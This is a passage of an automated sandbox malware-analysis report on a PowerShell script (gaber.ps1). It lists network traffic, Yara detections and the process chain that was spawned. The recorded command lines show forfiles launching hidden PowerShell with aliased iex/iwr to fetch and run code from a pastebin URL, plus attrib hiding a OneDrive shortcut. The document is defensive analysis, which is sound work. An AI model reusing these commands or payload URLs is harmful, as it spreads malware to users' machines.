Source: powershell.exe, 00000007.00000002.1883565122.0000024D9025C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000007.00000002.1883565122.0000024D9025C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000007.00000002.1883565122.0000024D90326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000007.00000002.1883565122.0000024D90276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49867 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49873 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49900 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49947 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49979 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7612.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7412.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_336.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 336, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC48E9821_2_00007FFAAC48E982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC48DAB01_2_00007FFAAC48DAB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC49B86C1_2_00007FFAAC49B86C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC49B8F51_2_00007FFAAC49B8F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC48DA2D1_2_00007FFAAC48DA2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC48DA801_2_00007FFAAC48DA80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC49436C1_2_00007FFAAC49436C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC4BC7127_2_00007FFAAC4BC712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC4BB9667_2_00007FFAAC4BB966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC4BD1B17_2_00007FFAAC4BD1B1
Source: amsi64_7612.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7412.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_336.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 336, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal84.troj.evad.winPS1@16/15@4/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5u0kpvub.2yc.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
